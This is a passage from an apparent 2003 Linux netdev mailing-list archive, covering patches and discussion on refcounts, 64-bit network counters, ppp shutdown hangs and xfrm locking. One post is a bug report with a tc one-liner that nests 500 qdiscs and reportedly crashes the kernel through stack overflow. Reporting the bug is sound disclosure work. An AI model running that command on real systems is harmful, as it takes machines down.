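	bool timer_pending;  /* stands in for mr_ifc_timer being armed */
};

/* Arming the timer takes one reference, but only if it was idle. */
void toy_arm_timer(struct toy_in_dev *d)
{
	if (!d->timer_pending) {
		d->timer_pending = true;
		d->refcnt++;
	}
}

/* Cancelling a pending timer hands that reference back. */
void toy_del_timer(struct toy_in_dev *d)
{
	if (d->timer_pending) {
		d->timer_pending = false;
		d->refcnt--;
	}
}

/* Dropping a group schedules a change report, i.e. arms the timer. */
void toy_group_dropped(struct toy_in_dev *d)
{
	toy_arm_timer(d);
}

/* Order described as problematic: cancel the timer, then drop groups.
 * Returns the final refcnt; 1 means only the caller's reference is left. */
int toy_down_timer_first(int ngroups)
{
	struct toy_in_dev d = { .refcnt = 1, .timer_pending = false };

	toy_arm_timer(&d);              /* some earlier event armed it */
	toy_del_timer(&d);
	for (int i = 0; i < ngroups; i++)
		toy_group_dropped(&d);  /* re-arms the timer */
	return d.refcnt;
}

/* Suggested order: drop groups first, cancel the timer afterwards. */
int toy_down_groups_first(int ngroups)
{
	struct toy_in_dev d = { .refcnt = 1, .timer_pending = false };

	toy_arm_timer(&d);
	for (int i = 0; i < ngroups; i++)
		toy_group_dropped(&d);
	toy_del_timer(&d);
	return d.refcnt;
}
```

in this model toy_down_timer_first(2) finishes with a refcnt of 2 (one reference stranded with the re-armed timer), while toy_down_groups_first(2) finishes with 1. with no groups to drop both orders end at 1, which would fit the problem only showing up on interfaces that have multicast memberships.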
From jmorris@intercode.com.au Sat Jul 5 10:58:31 2003 Received: with ECARTIS (v1.0.0; list netdev); Sat, 05 Jul 2003 10:58:34 -0700 (PDT) Received: from blackbird.intercode.com.au (IDENT:zklLyXdkVtQeqBRWV7vlAaoO+PS3w/oO@blackbird.intercode.com.au [203.32.101.10]) by oss.sgi.com (8.12.9/8.12.9) with SMTP id h65HwS2x029318 for ; Sat, 5 Jul 2003 10:58:30 -0700 Received: from excalibur.intercode.com.au (excalibur.intercode.com.au [203.32.101.12]) by blackbird.intercode.com.au (8.11.6p2/8.9.3) with ESMTP id h65Hvur30414; Sun, 6 Jul 2003 03:57:57 +1000 Date: Sun, 6 Jul 2003 03:57:55 +1000 (EST) From: James Morris To: YOSHIFUJI Hideaki / =?iso-2022-jp?B?GyRCNUhGIzFRTEAbKEI=?= cc: davem@redhat.com, , , Subject: Re: [PATCH] ATM: CLIP: C99 initializers In-Reply-To: <20030703.183850.78164037.yoshfuji@linux-ipv6.org> Message-ID: MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=ISO-8859-1 X-archive-position: 3770 X-ecartis-version: Ecartis v1.0.0 Sender: netdev-bounce@oss.sgi.com Errors-to: netdev-bounce@oss.sgi.com X-original-sender: jmorris@intercode.com.au Precedence: bulk X-list: netdev On Thu, 3 Jul 2003, YOSHIFUJI Hideaki / [iso-2022-jp] $B5HF#1QL@(B wrote: > This converts nlip_tbl to C99 initializers. > (and fixes wrong value for proxy_len and locktime.) Heh, nice catch. 
Applied to bk://kernel.bkbits.net/jmorris/net-2.5 - James -- James Morris From jmorris@intercode.com.au Sat Jul 5 11:11:27 2003 Received: with ECARTIS (v1.0.0; list netdev); Sat, 05 Jul 2003 11:11:36 -0700 (PDT) Received: from blackbird.intercode.com.au (IDENT:qbv7G6atDeF37mJ5F/sn6KcyBRyLcryE@blackbird.intercode.com.au [203.32.101.10]) by oss.sgi.com (8.12.9/8.12.9) with SMTP id h65IBO2x029729 for ; Sat, 5 Jul 2003 11:11:26 -0700 Received: from excalibur.intercode.com.au (excalibur.intercode.com.au [203.32.101.12]) by blackbird.intercode.com.au (8.11.6p2/8.9.3) with ESMTP id h65IBLr30679; Sun, 6 Jul 2003 04:11:21 +1000 Date: Sun, 6 Jul 2003 04:11:20 +1000 (EST) From: James Morris To: netdev@oss.sgi.com cc: lode leroy Subject: [PATCH] 2.5.70 - display bootserver in /proc/net/pnp (net/ipv4/ipconfig.c) (fwd) Message-ID: MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII X-archive-position: 3771 X-ecartis-version: Ecartis v1.0.0 Sender: netdev-bounce@oss.sgi.com Errors-to: netdev-bounce@oss.sgi.com X-original-sender: jmorris@intercode.com.au Precedence: bulk X-list: netdev Forwarded to netdev for comment. ---------- Forwarded message ---------- Date: Fri, 04 Jul 2003 11:43:38 +0200 From: lode leroy To: linux-kernel@vger.kernel.org Cc: mj@atrey.karlin.mff.cuni.cz Subject: [PATCH] 2.5.70 - display bootserver in /proc/net/pnp (net/ipv4/ipconfig.c) Hello, I would like to submit a trivial enhancement to display the ip address of the bootserver in /proc/net/pnp This aids me in developing a diskless linux root image to know where it comes from... 
please kindly apply this to the current linux 2.7.x tree -- lode # diff -u net/ipv4/ipconfig.{orig,c} --- net/ipv4/ipconfig.orig 2003-05-27 03:00:21.000000000 +0200 +++ net/ipv4/ipconfig.c 2003-07-04 11:17:30.000000000 +0200 @@ -1115,6 +1115,9 @@ "nameserver %u.%u.%u.%u\n", NIPQUAD(ic_nameservers[i])); } + len += sprintf(buffer + len, + "bootserver %u.%u.%u.%u\n", + NIPQUAD(ic_servaddr)); if (offset > len) offset = len; _________________________________________________________________ Receive your Hotmail & Messenger messages on your mobile phone with MSN Mobile http://www.msn.be/gsm/smsservices - To unsubscribe from this list: send the line "unsubscribe linux-kernel" in the body of a message to majordomo@vger.kernel.org More majordomo info at http://vger.kernel.org/majordomo-info.html Please read the FAQ at http://www.tux.org/lkml/ From jgarzik@pobox.com Sat Jul 5 13:41:04 2003 Received: with ECARTIS (v1.0.0; list netdev); Sat, 05 Jul 2003 13:41:11 -0700 (PDT) Received: from www.linux.org.uk (parcelfarce.linux.theplanet.co.uk [195.92.249.252]) by oss.sgi.com (8.12.9/8.12.9) with SMTP id h65Kf32x031253 for ; Sat, 5 Jul 2003 13:41:04 -0700 Received: from rdu26-227-011.nc.rr.com ([66.26.227.11] helo=pobox.com) by www.linux.org.uk with esmtp (Exim 4.14) id 19Ytq8-0002Ji-GT; Sat, 05 Jul 2003 21:41:00 +0100 Message-ID: <3F0737D1.5090109@pobox.com> Date: Sat, 05 Jul 2003 16:40:49 -0400 From: Jeff Garzik Organization: none User-Agent: Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.2.1) Gecko/20021213 Debian/1.2.1-2.bunk X-Accept-Language: en MIME-Version: 1.0 To: Jeff Sipek CC: Bernd Eckenfels , linux-kernel@vger.kernel.org, Andrew Morton , Dave Jones , Linus Torvalds , netdev@oss.sgi.com Subject: Re: [PATCH - RFC] [1/5] 64-bit network statistics - generic net References: <200307051637.52252.jeffpc@optonline.net> In-Reply-To: <200307051637.52252.jeffpc@optonline.net> Content-Type: text/plain; charset=us-ascii; format=flowed Content-Transfer-Encoding: 7bit 
X-archive-position: 3775 X-ecartis-version: Ecartis v1.0.0 Sender: netdev-bounce@oss.sgi.com Errors-to: netdev-bounce@oss.sgi.com X-original-sender: jgarzik@pobox.com Precedence: bulk X-list: netdev The net stats are already unsigned long internally. 64-bit case is handled quite nicely today, thanks :) I'm such a 64-bit bigot that "buy a 64-bit computer" is a solution I commonly suggest, and it seems to fit well here, too. Jeff, wondering if Intel will bother to compete w/ Athlon64 From jeffpc@optonline.net Sat Jul 5 13:53:15 2003 Received: with ECARTIS (v1.0.0; list netdev); Sat, 05 Jul 2003 13:53:19 -0700 (PDT) Received: from mta2.srv.hcvlny.cv.net (mta2.srv.hcvlny.cv.net [167.206.5.5]) by oss.sgi.com (8.12.9/8.12.9) with SMTP id h65KrE2x031532 for ; Sat, 5 Jul 2003 13:53:15 -0700 Received: from asv19.srv.hcvlny.cv.net (asv19.srv.hcvlny.cv.net [167.206.5.173]) by mta2.srv.hcvlny.cv.net (iPlanet Messaging Server 5.2 HotFix 1.16 (built May 14 2003)) with ESMTP id <0HHK00K63JZ9MF@mta2.srv.hcvlny.cv.net> for netdev@oss.sgi.com; Sat, 05 Jul 2003 16:37:57 -0400 (EDT) Received: from jeff.home (ool-44c2049f.dyn.optonline.net [68.194.4.159]) by asv19.srv.hcvlny.cv.net (8.12.9/8.12.9) with ESMTP id h65KaujJ009847; Sat, 05 Jul 2003 16:36:57 -0400 (EDT) Date: Sat, 05 Jul 2003 16:37:43 -0400 From: Jeff Sipek Subject: Re: [PATCH - RFC] [1/5] 64-bit network statistics - generic net In-reply-to: To: Bernd Eckenfels , linux-kernel@vger.kernel.org Cc: Andrew Morton , Dave Jones , Linus Torvalds , netdev@oss.sgi.com, Jeff Garzik Message-id: <200307051637.52252.jeffpc@optonline.net> MIME-version: 1.0 Content-type: Text/Plain; charset=iso-8859-1 Content-transfer-encoding: 7BIT Content-disposition: inline Content-description: clearsigned data User-Agent: KMail/1.5.2 References: X-archive-position: 3776 X-ecartis-version: Ecartis v1.0.0 Sender: netdev-bounce@oss.sgi.com Errors-to: netdev-bounce@oss.sgi.com X-original-sender: jeffpc@optonline.net Precedence: bulk X-list: netdev 
-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1

On Saturday 05 July 2003 15:58, Bernd Eckenfels wrote:
> a reader like ifconfig can easily work around this with multiple tries, but
> incrementing those variables won't work that easily, and therefore needs a
> lock, which will be a major pita.
>
> 64bit counters should be a result of lockless per-cpu network counters
> (32bit) with some kind of async merging.

This is going to make the structure huge: not only do you have the 32-bit variables for every CPU, but you also have one global set of 64-bit variables (and you will possibly need a lock for the 64-bit vars). Another thing to consider is portability across architectures: we don't need all this code on 64-bit arches. On the other hand, per-cpu stats may make up for the extra code (no cache bouncing, etc.).

> Or we wait till 64bit hardware is more common :)

Hehe, the thing is that when 64 bits become more common you will have a huge number of unused x86 computers that people will:

- - throw out
- - donate
- - convert to all sorts of "embedded" systems which need a stable OS (read: Linux) (these include routers)

So, x86 is here to stay for some time.

Jeff.
- -- The Moon is Waxing Crescent (36% of Full) -----BEGIN PGP SIGNATURE----- Version: GnuPG v1.2.2 (GNU/Linux) iD8DBQE/BzcbwFP0+seVj/4RAuMHAJ9sN0E4OgsPeM09D6hbgM3boECLDwCbBDTP 6u8SSobW0+Y0oWq3H4koHd0= =Z89A -----END PGP SIGNATURE----- From greearb@candelatech.com Sat Jul 5 14:46:52 2003 Received: with ECARTIS (v1.0.0; list netdev); Sat, 05 Jul 2003 14:46:57 -0700 (PDT) Received: from grok.yi.org (evrtwa1-ar2-4-33-045-074.evrtwa1.dsl-verizon.net [4.33.45.74]) by oss.sgi.com (8.12.9/8.12.9) with SMTP id h65Lkn2x032090 for ; Sat, 5 Jul 2003 14:46:52 -0700 Received: from candelatech.com (localhost.localdomain [127.0.0.1]) by grok.yi.org (8.12.8/8.12.8) with ESMTP id h65LkXKk002853; Sat, 5 Jul 2003 14:46:33 -0700 Message-ID: <3F074739.9090006@candelatech.com> Date: Sat, 05 Jul 2003 14:46:33 -0700 From: Ben Greear Organization: Candela Technologies User-Agent: Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.4) Gecko/20030529 X-Accept-Language: en-us, en MIME-Version: 1.0 To: Jeff Sipek CC: Linus Torvalds , Kernel Mailing List , Andrew Morton , Dave Jones , Jeff Garzik , netdev@oss.sgi.com Subject: Re: [PATCH - RFC] [1/5] 64-bit network statistics - generic net References: <200307051449.32934.jeffpc@optonline.net> In-Reply-To: <200307051449.32934.jeffpc@optonline.net> Content-Type: text/plain; charset=us-ascii; format=flowed Content-Transfer-Encoding: 7bit X-archive-position: 3779 X-ecartis-version: Ecartis v1.0.0 Sender: netdev-bounce@oss.sgi.com Errors-to: netdev-bounce@oss.sgi.com X-original-sender: greearb@candelatech.com Precedence: bulk X-list: netdev Jeff Sipek wrote: > Using KB would give us additional 10 bits (making the overflow at 4 TB.) I > don't really like the idea of using MB, but the underlying idea is the same - > 20 more bits, making the limit 4 PB. > > What is the consensus on this way of solving the problem? 
I guess it could be useful for something like ifconfig, but serious applications will need more precision and should deal with wraps anyway (even on 64-bits, in my opinion..why have to fix bugs in 10 years because we were too lazy to take the 10 minutes to make it right now). Ben -- Ben Greear President of Candela Technologies Inc http://www.candelatech.com ScryMUD: http://scry.wanfear.com http://scry.wanfear.com/~greear From creatix@hipac.org Sat Jul 5 15:29:02 2003 Received: with ECARTIS (v1.0.0; list netdev); Sat, 05 Jul 2003 15:29:09 -0700 (PDT) Received: from smtprelay02.ispgateway.de (smtprelay02.ispgateway.de [62.67.200.157]) by oss.sgi.com (8.12.9/8.12.9) with SMTP id h65MT02x032496 for ; Sat, 5 Jul 2003 15:29:01 -0700 Received: (qmail 11005 invoked from network); 5 Jul 2003 22:22:19 -0000 Received: from unknown (HELO portal.lan) (134300@[80.138.229.66]) (envelope-sender ) by smtprelay02.ispgateway.de (qmail-ldap-1.03) with SMTP for ; 5 Jul 2003 22:22:19 -0000 Received: from hipac.org (tmobile.lan [192.168.0.6]) by portal.lan (Postfix) with ESMTP id 16A084B07E; Sat, 5 Jul 2003 22:54:42 +0200 (CEST) Message-ID: <3F074F74.2090308@hipac.org> Date: Sun, 06 Jul 2003 00:21:40 +0200 From: Thomas Heinz Reply-To: Thomas Heinz User-Agent: Mozilla/5.0 (X11; U; Linux i686; de-AT; rv:1.0.0) Gecko/20020623 Debian/1.0.0-0.woody.1 X-Accept-Language: de, en MIME-Version: 1.0 To: linux-kernel@vger.kernel.org, netdev@oss.sgi.com Subject: tc stack overflow Content-Type: text/plain; charset=us-ascii; format=flowed Content-Transfer-Encoding: 7bit X-archive-position: 3780 X-ecartis-version: Ecartis v1.0.0 Sender: netdev-bounce@oss.sgi.com Errors-to: netdev-bounce@oss.sgi.com X-original-sender: creatix@hipac.org Precedence: bulk X-list: netdev Hi Have you already crashed your kernel today? No? 
Well, try this one:

# tc qdisc add dev eth0 root handle 1: prio ; \
  for i in `seq 500` ; do tc qdisc add dev eth0 \
  parent $i:1 handle `expr $i + 1`: prio ; done ; \
  ping 1.2.3.4

[replace eth0 by a device of your choice]

I think some of you are aware of the problem but strangely I didn't find any mention on linux-kernel or linux-netdev or lartc.

The problem is that the depth of the classification tree is not limited in any way, and since the corresponding enqueue function is called for every qdisc on the way down, we get a stack overflow here.

IMO the problem could be fixed by adding a depth parameter to the enqueue function. This way the function can decide whether it is safe to go deeper down the tree (maybe subject to a global policy).

So, what do you think about the issue? Do you care?

Regards, Thomas

From romieu@fr.zoreil.com Sat Jul 5 15:55:29 2003 Received: with ECARTIS (v1.0.0; list netdev); Sat, 05 Jul 2003 15:55:33 -0700 (PDT) Received: from fr.zoreil.com (electric-eye.fr.zoreil.com [213.41.134.224]) by oss.sgi.com (8.12.9/8.12.9) with SMTP id h65MtQ2x000342 for ; Sat, 5 Jul 2003 15:55:27 -0700 Received: from electric-eye.fr.zoreil.com (localhost.localdomain [127.0.0.1]) by fr.zoreil.com (8.12.8/8.12.1) with ESMTP id h65LpWfI010947; Sat, 5 Jul 2003 23:51:32 +0200 Received: (from romieu@localhost) by electric-eye.fr.zoreil.com (8.12.8/8.12.1) id h65LpVDx010946; Sat, 5 Jul 2003 23:51:31 +0200 Date: Sat, 5 Jul 2003 23:51:31 +0200 From: Francois Romieu To: Jeff Sipek Cc: Jeff Garzik , Bernd Eckenfels , linux-kernel@vger.kernel.org, Andrew Morton , Dave Jones , Linus Torvalds , netdev@oss.sgi.com Subject: Re: [PATCH - RFC] [1/5] 64-bit network statistics - generic net Message-ID: <20030705235131.A10511@electric-eye.fr.zoreil.com> References: <200307051637.52252.jeffpc@optonline.net> <3F0737D1.5090109@pobox.com> <200307051700.32533.jeffpc@optonline.net> Mime-Version: 1.0 Content-Type: text/plain; charset=us-ascii Content-Disposition: inline User-Agent: Mutt/1.2.5.1i In-Reply-To:
<200307051700.32533.jeffpc@optonline.net>; from jeffpc@optonline.net on Sat, Jul 05, 2003 at 04:59:05PM -0400 X-archive-position: 3782 X-ecartis-version: Ecartis v1.0.0 Sender: netdev-bounce@oss.sgi.com Errors-to: netdev-bounce@oss.sgi.com X-original-sender: romieu@fr.zoreil.com Precedence: bulk X-list: netdev Jeff Sipek : [network counter overflow on 32 bits systems] > The thing is that x86 is here to stay for quite some time. Even if 64-bit > processors take over the market, you will have so many "old" computers that > can: > > - - be thrown out > - - donated to some institution > - - converted to routers, and other "embedded" systems > > Plus, they will be dirt cheap. - the PCI bus don't/won't/can't handle multiple 10 Gb/s adapters; - nobody sane would recycle x86 systems as core routers after having bought a few Gb/s link. -- Ueimor From greearb@candelatech.com Sat Jul 5 16:36:21 2003 Received: with ECARTIS (v1.0.0; list netdev); Sat, 05 Jul 2003 16:36:28 -0700 (PDT) Received: from grok.yi.org (evrtwa1-ar2-4-33-045-074.evrtwa1.dsl-verizon.net [4.33.45.74]) by oss.sgi.com (8.12.9/8.12.9) with SMTP id h65NaK2x001026 for ; Sat, 5 Jul 2003 16:36:20 -0700 Received: from candelatech.com (localhost.localdomain [127.0.0.1]) by grok.yi.org (8.12.8/8.12.8) with ESMTP id h65Lf0Kk002164; Sat, 5 Jul 2003 14:41:03 -0700 Message-ID: <3F0745EC.1060204@candelatech.com> Date: Sat, 05 Jul 2003 14:41:00 -0700 From: Ben Greear Organization: Candela Technologies User-Agent: Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.4) Gecko/20030529 X-Accept-Language: en-us, en MIME-Version: 1.0 To: Jeff Garzik CC: Jeff Sipek , Bernd Eckenfels , linux-kernel@vger.kernel.org, Andrew Morton , Dave Jones , Linus Torvalds , netdev@oss.sgi.com Subject: Re: [PATCH - RFC] [1/5] 64-bit network statistics - generic net References: <200307051637.52252.jeffpc@optonline.net> <3F0737D1.5090109@pobox.com> In-Reply-To: <3F0737D1.5090109@pobox.com> Content-Type: text/plain; charset=us-ascii; format=flowed 
Content-Transfer-Encoding: 7bit X-archive-position: 3783 X-ecartis-version: Ecartis v1.0.0 Sender: netdev-bounce@oss.sgi.com Errors-to: netdev-bounce@oss.sgi.com X-original-sender: greearb@candelatech.com Precedence: bulk X-list: netdev

Jeff Garzik wrote:
> The net stats are already unsigned long internally.
>
> 64-bit case is handled quite nicely today, thanks :)
>
> I'm such a 64-bit bigot that "buy a 64-bit computer" is a solution I
> commonly suggest, and it seems to fit well here, too.
>
> Jeff, wondering if Intel will bother to compete w/ Athlon64

Until the net-stats are 64-bit on 32-bit systems, we will need some way to know if they have wrapped or not when reading from nettool and getting 64-bit numbers.

I guess what I really mean to say is that, if nettool is returning 64-bit values, we need to know which ones are obtained from 32-bit counters. 32 -> 64 bit mapping will require wrap handling on low 32-bits, but 64 -> 64 bit mapping will require wrapping about 4-billion times less often :)

Perhaps a precision field is also needed for backwards/forwards compatibility, and perhaps a nettool version field as well to also help with backwards/forwards compat.
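The 32 -> 64 bit wrap handling mentioned above can be sketched from the reader's side roughly as follows. This is only an illustration, not code from nettool or the kernel: `struct wide_counter`, `wide_counter_init` and `wide_counter_update` are hypothetical names, and the sketch assumes the raw counter is sampled at least once per wrap period and is never reset between samples.

```c
#include <stdint.h>

/* Hypothetical reader-side state for one 32-bit kernel counter. */
struct wide_counter {
    uint32_t last;   /* last raw 32-bit sample seen */
    uint64_t total;  /* value extended to 64 bits */
};

/* Start tracking from the first raw sample. */
static void wide_counter_init(struct wide_counter *wc, uint32_t raw)
{
    wc->last = raw;
    wc->total = raw;
}

/*
 * Fold a new raw sample into the 64-bit total.
 * The subtraction is done modulo 2^32, so a single wrap between
 * two samples still yields the correct (small) delta.
 * Assumption: at most one wrap happened since the previous sample.
 */
static uint64_t wide_counter_update(struct wide_counter *wc, uint32_t raw)
{
    uint32_t delta = (uint32_t)(raw - wc->last);

    wc->last = raw;
    wc->total += delta;
    return wc->total;
}
```

A reader that polls more slowly than the counter can wrap would silently lose multiples of 2^32, which is why some indication of the underlying counter width is useful to the application.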
Ben > > > -- Ben Greear President of Candela Technologies Inc http://www.candelatech.com ScryMUD: http://scry.wanfear.com http://scry.wanfear.com/~greear From romieu@fr.zoreil.com Sat Jul 5 16:45:41 2003 Received: with ECARTIS (v1.0.0; list netdev); Sat, 05 Jul 2003 16:45:45 -0700 (PDT) Received: from fr.zoreil.com (electric-eye.fr.zoreil.com [213.41.134.224]) by oss.sgi.com (8.12.9/8.12.9) with SMTP id h65Njd2x001206 for ; Sat, 5 Jul 2003 16:45:40 -0700 Received: from electric-eye.fr.zoreil.com (localhost.localdomain [127.0.0.1]) by fr.zoreil.com (8.12.8/8.12.1) with ESMTP id h65NiPfI011755; Sun, 6 Jul 2003 01:44:25 +0200 Received: (from romieu@localhost) by electric-eye.fr.zoreil.com (8.12.8/8.12.1) id h65NiOmB011754; Sun, 6 Jul 2003 01:44:24 +0200 Date: Sun, 6 Jul 2003 01:44:23 +0200 From: Francois Romieu To: Jeff Sipek Cc: Jeff Garzik , Bernd Eckenfels , linux-kernel@vger.kernel.org, Andrew Morton , Dave Jones , Linus Torvalds , netdev@oss.sgi.com Subject: Re: [PATCH - RFC] [1/5] 64-bit network statistics - generic net Message-ID: <20030706014423.A11165@electric-eye.fr.zoreil.com> References: <200307051700.32533.jeffpc@optonline.net> <20030705235131.A10511@electric-eye.fr.zoreil.com> <200307051839.50327.jeffpc@optonline.net> Mime-Version: 1.0 Content-Type: text/plain; charset=us-ascii Content-Disposition: inline User-Agent: Mutt/1.2.5.1i In-Reply-To: <200307051839.50327.jeffpc@optonline.net>; from jeffpc@optonline.net on Sat, Jul 05, 2003 at 06:39:41PM -0400 X-archive-position: 3784 X-ecartis-version: Ecartis v1.0.0 Sender: netdev-bounce@oss.sgi.com Errors-to: netdev-bounce@oss.sgi.com X-original-sender: romieu@fr.zoreil.com Precedence: bulk X-list: netdev Jeff Sipek : [...] > P.S. 
I just looked up the cheapest gigabit copper I could find in 10 seconds, > and I found: D-Link DGE-500T for $36.27 this is just 4 times the price of the > cheapest fast ethernet I found on the same site (cdw.com - they are not the > cheapest, but I like them) Please google around on the topic "nanog/gigabit/routing/linux" and read netdev archive again. It isn't _that_ simple. -- Ueimor From alan@lxorguk.ukuu.org.uk Sun Jul 6 00:30:35 2003 Received: with ECARTIS (v1.0.0; list netdev); Sun, 06 Jul 2003 00:31:05 -0700 (PDT) Received: from lxorguk.ukuu.org.uk (pc2-cwma1-4-cust86.swan.cable.ntl.com [213.105.254.86]) by oss.sgi.com (8.12.9/8.12.9) with SMTP id h667UV2x004845 for ; Sun, 6 Jul 2003 00:30:34 -0700 Received: from dhcp22.swansea.linux.org.uk (dhcp22.swansea.linux.org.uk [127.0.0.1]) by lxorguk.ukuu.org.uk (8.12.8/8.12.5) with ESMTP id h667RIKd000765; Sun, 6 Jul 2003 08:27:18 +0100 Received: (from alan@localhost) by dhcp22.swansea.linux.org.uk (8.12.8/8.12.8/Submit) id h667REEW000763; Sun, 6 Jul 2003 08:27:14 +0100 X-Authentication-Warning: dhcp22.swansea.linux.org.uk: alan set sender to alan@lxorguk.ukuu.org.uk using -f Subject: Re: [PATCH - RFC] [1/5] 64-bit network statistics - generic net From: Alan Cox To: Ben Greear Cc: Jeff Garzik , Jeff Sipek , Bernd Eckenfels , Linux Kernel Mailing List , Andrew Morton , Dave Jones , Linus Torvalds , netdev@oss.sgi.com In-Reply-To: <3F0745EC.1060204@candelatech.com> References: <200307051637.52252.jeffpc@optonline.net> <3F0737D1.5090109@pobox.com> <3F0745EC.1060204@candelatech.com> Content-Type: text/plain Content-Transfer-Encoding: 7bit Organization: Message-Id: <1057476433.700.2.camel@dhcp22.swansea.linux.org.uk> Mime-Version: 1.0 X-Mailer: Ximian Evolution 1.2.2 (1.2.2-5) Date: 06 Jul 2003 08:27:14 +0100 X-archive-position: 3786 X-ecartis-version: Ecartis v1.0.0 Sender: netdev-bounce@oss.sgi.com Errors-to: netdev-bounce@oss.sgi.com X-original-sender: alan@lxorguk.ukuu.org.uk Precedence: bulk X-list: netdev On Sad, 
2003-07-05 at 22:41, Ben Greear wrote: > Untill the net-stats are 64-bit on 32-bit systems, we will need some > way to know if they have wrapped or not when reading from nettool > and getting 64-bit numbers. iptables Collecting the data on a need to know basis 8) From rol@as2917.net Sun Jul 6 02:43:42 2003 Received: with ECARTIS (v1.0.0; list netdev); Sun, 06 Jul 2003 02:43:46 -0700 (PDT) Received: from tag.witbe.net (IDENT:root@tag.witbe.net [81.88.96.48]) by oss.sgi.com (8.12.9/8.12.9) with SMTP id h669he2x009514 for ; Sun, 6 Jul 2003 02:43:41 -0700 Received: from fifi (APuteaux-102-1-1-241.w193-251.abo.wanadoo.fr [193.251.27.241]) by tag.witbe.net (8.11.0/8.11.0) with ESMTP id h669hVp08325; Sun, 6 Jul 2003 09:43:31 GMT From: "Paul Rolland" To: "'Chris Friesen'" , Cc: , , , Subject: Re: [BUG]: problem when shutting down ppp connection since 2.5.70 Date: Sun, 6 Jul 2003 11:43:30 +0200 Message-ID: <008201c343a3$0f9f8a70$2101a8c0@witbe> MIME-Version: 1.0 Content-Type: text/plain; charset="US-ASCII" Content-Transfer-Encoding: 7bit X-Priority: 3 (Normal) X-MSMail-Priority: Normal X-Mailer: Microsoft Outlook, Build 10.0.4510 In-Reply-To: <3F03BC55.6050506@nortelnetworks.com> X-MimeOLE: Produced By Microsoft MimeOLE V6.00.2600.0000 Importance: Normal X-archive-position: 3787 X-ecartis-version: Ecartis v1.0.0 Sender: netdev-bounce@oss.sgi.com Errors-to: netdev-bounce@oss.sgi.com X-original-sender: rol@as2917.net Precedence: bulk X-list: netdev Hello, > Well, I've upgraded to the latest 2.5.74 kernel and pppd > version 2.4.2b3 > (still using the rp-pppoe userspace software though). > > Per Stephen's suggestion I also tried removing the ip address and > bringing down the ppp link before shuttind down the adsl connection. > > Makes no difference. > To complete on this topic : I've got the problem since 2.5.70, when netdev_wait_allrefs has been introduced in net/core/dev.c I have the same behavior using vtund, configured to create a tap0 interface. 
At shutdown time, the interface refuses to get freed and I'm stuck. Having vtund started at boot time (within the /etc/rc.d/... stuff) or later doesn't make any difference. Shutting down the interface before stopping the application or halting the machine doesn't make any difference either. The other problem is that the current implementation of netdev_wait_allrefs makes that if you kill an application that is using a device not correctly counted, you lock the console you are working on. e.g., killing vtund will create a printk(... unregister_netdevice...), and the console cannot be used anymore as long as the counter hasn't reached 0 and the device is freed... Paul From jmorris@intercode.com.au Sun Jul 6 05:43:30 2003 Received: with ECARTIS (v1.0.0; list netdev); Sun, 06 Jul 2003 05:43:36 -0700 (PDT) Received: from blackbird.intercode.com.au (IDENT:Y6eLAoDcGUlJvIAdPB8S+8iU7wcEA3WC@blackbird.intercode.com.au [203.32.101.10]) by oss.sgi.com (8.12.9/8.12.9) with SMTP id h66ChQ2x016252 for ; Sun, 6 Jul 2003 05:43:28 -0700 Received: from excalibur.intercode.com.au (excalibur.intercode.com.au [203.32.101.12]) by blackbird.intercode.com.au (8.11.6p2/8.9.3) with ESMTP id h66Cger08253; Sun, 6 Jul 2003 22:42:41 +1000 Date: Sun, 6 Jul 2003 22:42:40 +1000 (EST) From: James Morris To: "David S. Miller" cc: kuznet@ms2.inr.ac.ru, Subject: [PATCH] Don't call request_module() under spinlock in xfrm_get_type() Message-ID: MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII X-archive-position: 3788 X-ecartis-version: Ecartis v1.0.0 Sender: netdev-bounce@oss.sgi.com Errors-to: netdev-bounce@oss.sgi.com X-original-sender: jmorris@intercode.com.au Precedence: bulk X-list: netdev This patch fixes a problem where request_module() was being called under the lock taken in xfrm_policy_get_afinfo(). An alternative fix would be to refcount xfrm_policy_afinfo structs, either explicitly or via a module owner field, although it seems like overkill in this case. 
- James -- James Morris diff -urN -X dontdiff bk.orig/net/xfrm/xfrm_policy.c bk.w1/net/xfrm/xfrm_policy.c --- bk.orig/net/xfrm/xfrm_policy.c 2003-07-06 02:59:18.000000000 +1000 +++ bk.w1/net/xfrm/xfrm_policy.c 2003-07-06 22:32:47.230524746 +1000 @@ -80,22 +80,24 @@ struct xfrm_type *xfrm_get_type(u8 proto, unsigned short family) { - struct xfrm_policy_afinfo *afinfo = xfrm_policy_get_afinfo(family); + struct xfrm_policy_afinfo *afinfo; struct xfrm_type_map *typemap; struct xfrm_type *type; int modload_attempted = 0; +retry: + afinfo = xfrm_policy_get_afinfo(family); if (unlikely(afinfo == NULL)) return NULL; typemap = afinfo->type_map; -retry: read_lock(&typemap->lock); type = typemap->map[proto]; if (unlikely(type && !try_module_get(type->owner))) type = NULL; read_unlock(&typemap->lock); if (!type && !modload_attempted) { + xfrm_policy_put_afinfo(afinfo); request_module("xfrm-type-%d-%d", (int) family, (int) proto); modload_attempted = 1; From niv@us.ibm.com Sun Jul 6 13:27:47 2003 Received: with ECARTIS (v1.0.0; list netdev); Sun, 06 Jul 2003 13:27:54 -0700 (PDT) Received: from e32.co.us.ibm.com (e32.co.us.ibm.com [32.97.110.130]) by oss.sgi.com (8.12.9/8.12.9) with SMTP id h66KRd2x020879 for ; Sun, 6 Jul 2003 13:27:46 -0700 Received: from westrelay03.boulder.ibm.com (westrelay03.boulder.ibm.com [9.17.195.12]) by e32.co.us.ibm.com (8.12.9/8.12.2) with ESMTP id h66KRW8w286636; Sun, 6 Jul 2003 16:27:32 -0400 Received: from us.ibm.com (d03av03.boulder.ibm.com [9.17.193.83]) by westrelay03.boulder.ibm.com (8.12.9/NCO/VER6.5) with ESMTP id h66KRVcW131778; Sun, 6 Jul 2003 14:27:32 -0600 Message-ID: <3F08858E.8000907@us.ibm.com> Date: Sun, 06 Jul 2003 13:24:46 -0700 From: Nivedita Singhvi User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.0; en-US; rv:1.2.1) Gecko/20021130 X-Accept-Language: en-us, en MIME-Version: 1.0 To: palbrecht@qwest.net CC: linux-kernel@vger.kernel.org, netdev Subject: Re: question about linux tcp request queue handling Content-Type: text/plain; 
